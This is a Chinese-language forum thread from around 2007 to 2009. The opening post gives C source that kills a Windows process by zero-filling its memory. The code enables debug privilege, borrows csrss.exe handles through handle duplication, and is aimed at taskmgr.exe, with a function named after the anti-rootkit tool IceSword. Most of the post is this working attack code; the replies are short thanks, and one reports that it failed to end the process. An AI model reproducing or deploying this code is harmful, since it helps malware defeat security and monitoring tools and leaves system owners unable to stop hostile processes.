|
阅读:3927回复:8
EP_X0FF进程填零的C代码版。
因为当时没有Delphi编译器,只好自己翻成C了。
/* This simple app demonstrates how to kill process by writing process's memory. Write by EP_X0FF and DNY,I just extract it to C ---- zjjmj2002 */ #include <Windows.h> #include <Ntsecapi.h> #include <Aclapi.h> #include <tlhelp32.h> #pragma comment (lib,"ntdll.lib") // Copy From DDK #pragma comment (lib,"Kernel32.lib") #pragma comment (lib,"Advapi32.lib") #pragma comment(linker, "/ENTRY:main") //------------------ 数据类型声明开始 --------------------// typedef struct _PROCESS_BASIC_INFORMATION { NTSTATUS ExitStatus; ULONG PebBaseAddress; ULONG_PTR AffinityMask; LONG BasePriority; ULONG_PTR UniqueProcessId; ULONG_PTR InheritedFromUniqueProcessId; } PROCESS_BASIC_INFORMATION; typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG ProcessId; UCHAR ObjectTypeNumber; UCHAR Flags; USHORT Handle; PVOID Object; ACCESS_MASK GrantedAccess; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef enum _SECTION_INHERIT { ViewShare = 1, ViewUnmap = 2 } SECTION_INHERIT; typedef struct _MY_PROCESS_INFO { ULONG PID; ULONG KPEB; ULONG CR3; CHAR Name[16]; ULONG Reserved; } MY_PROCESS_INFO, *PMY_PROCESS_INFO; typedef struct _CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; } CLIENT_ID; typedef CLIENT_ID *PCLIENT_ID; typedef long NTSTATUS; //------------------ 数据类型声明结束 --------------------// //--------------------- 预定义开始 -----------------------// #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) #define STATUS_SUCCESS 0x00000000 #define STATUS_UNSUCCESSFUL 0xC0000001 #define STATUS_NOT_IMPLEMENTED 0xC0000002 #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 #define STATUS_INVALID_PARAMETER 0xC000000D #define STATUS_ACCESS_DENIED 0xC0000022 #define STATUS_BUFFER_TOO_SMALL 0xC0000023 #define OBJ_KERNEL_HANDLE 0x00000200 #define SystemModuleInformation 11 #define SystemHandleInformation 0x10 #define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r; (p)->Attributes = a; (p)->ObjectName = n; (p)->SecurityDescriptor = s; (p)->SecurityQualityOfService = NULL; } //--------------------- 预定义结束 -----------------------// //------------------ Native API声明开始 ------------------// NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); NTSYSAPI NTSTATUS NTAPI ZwOpenProcess( OUT PHANDLE ProcessHandle, IN ACCESS_MASK AccessMask, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId ); NTSYSAPI NTSTATUS NTAPI ZwAllocateVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect ); NTSYSAPI NTSTATUS NTAPI ZwDuplicateObject( IN HANDLE SourceProcessHandle, IN PHANDLE SourceHandle, IN HANDLE TargetProcessHandle, OUT PHANDLE TargetHandle, IN ACCESS_MASK DesiredAccess OPTIONAL, IN BOOLEAN InheritHandle, IN ULONG Options ); NTSYSAPI NTSTATUS NTAPI ZwQueryInformationProcess( IN HANDLE ProcessHandle, IN PVOID ProcessInformationClass, OUT PVOID ProcessInformation, IN ULONG ProcessInformationLength, OUT PULONG ReturnLength ); NTSYSAPI NTSTATUS NTAPI ZwProtectVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN OUT PULONG NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection ); NTSYSAPI NTSTATUS NTAPI ZwWriteVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN PVOID Buffer, IN ULONG NumberOfBytesToWrite, OUT PULONG NumberOfBytesWritten OPTIONAL ); NTSYSAPI NTSTATUS NTAPI ZwClose( IN HANDLE ObjectHandle ); NTSYSAPI NTSTATUS NTAPI ZwFreeVirtualMemory( IN HANDLE ProcessHandle, IN PVOID *BaseAddress, IN OUT PULONG RegionSize, IN ULONG FreeType ); //------------------ Native API声明结束 ------------------// //------------------ 程序正式开始 ------------------// DWORD GetPidByName(char *szName) { HANDLE hProcessSnap = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe32={0}; DWORD dwRet=0; hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE)return 0; pe32.dwSize = sizeof(PROCESSENTRY32); if(Process32First(hProcessSnap, &pe32)) { do { if(lstrcmpi(szName,pe32.szExeFile)==0) { dwRet=pe32.th32ProcessID; break; } }while (Process32Next(hProcessSnap,&pe32)); } else return 0; if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap); return dwRet; } void KillIce(ULONG dwProcessId) { HANDLE ph, h_dup; ULONG bytesIO; PVOID buf; ULONG i; CLIENT_ID cid1; OBJECT_ATTRIBUTES attr; HANDLE csrss_id; HANDLE SnapShotHandle; PROCESS_BASIC_INFORMATION pbi; PVOID p0, p1; ULONG sz, oldp; ULONG NumOfHandle; PSYSTEM_HANDLE_INFORMATION h_info; csrss_id = (HANDLE)GetPidByName("csrss.exe"); attr.Length = sizeof(OBJECT_ATTRIBUTES); attr.RootDirectory = 0; attr.ObjectName = 0; attr.Attributes = 0; attr.SecurityDescriptor = 0; attr.SecurityQualityOfService = 0; cid1.UniqueProcess = csrss_id; cid1.UniqueThread = 0; ZwOpenProcess(&ph, PROCESS_ALL_ACCESS, &attr, &cid1); bytesIO = 0x400000; buf = 0; ZwAllocateVirtualMemory(GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE); ZwQuerySystemInformation(SystemHandleInformation, buf, 0x400000, &bytesIO); NumOfHandle = (ULONG)buf; h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4); for (i= 0 ; i<NumOfHandle; i++) { if ((h_info.ProcessId == (ULONG)csrss_id)&&(h_info.ObjectTypeNumber == 5)) { if (ZwDuplicateObject(ph, (PHANDLE)h_info.Handle, (HANDLE)-1, &h_dup, 0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS) ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO); if (pbi.UniqueProcessId == dwProcessId) { MessageBox(0, "目标已确定!", "OK", MB_OK); for (i = 0x1000; i<0x80000000; i = i + 0x1000) { p0 = (PVOID)i; p1 = p0; sz = 0x1000; if (ZwProtectVirtualMemory(h_dup, &p1, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS) { ZwWriteVirtualMemory(h_dup, p0, buf, 0x1000, &oldp); } } MessageBox(0, "任务已完成!","OK", 0); ZwClose(h_dup); } } } bytesIO = 0; ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE); } BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable) { TOKEN_PRIVILEGES tp; tp.PrivilegeCount = 1; LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid); tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL); return((GetLastError() == ERROR_SUCCESS)); } void main() { ULONG Pid; HANDLE hToken; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); if (Pid = GetPidByName("taskmgr.exe")) { KillIce(Pid); } ExitProcess(0); } |
|
驱动小牛
|
沙发#
发布于:2007-09-16 14:57
收藏.
|
|
板凳#
发布于:2007-09-16 19:55
存起来先,有空再看
|
|
|
地板#
发布于:2007-09-16 21:55
第一次看楼主写C代码~
不过我记得yyking放的是驱动版的填0~ |
|
|
|
地下室#
发布于:2007-09-17 01:05
填0?酷
|
|
|
5楼#
发布于:2007-09-21 21:48
试试!
|
|
|
|
6楼#
发布于:2008-10-31 15:22
学习了!
|
|
|
|
7楼#
发布于:2009-03-22 00:42
 编译成功,不能结束进程。 |
|
|
8楼#
发布于:2009-06-22 22:42
学习ing。。。。。。。。。
|
|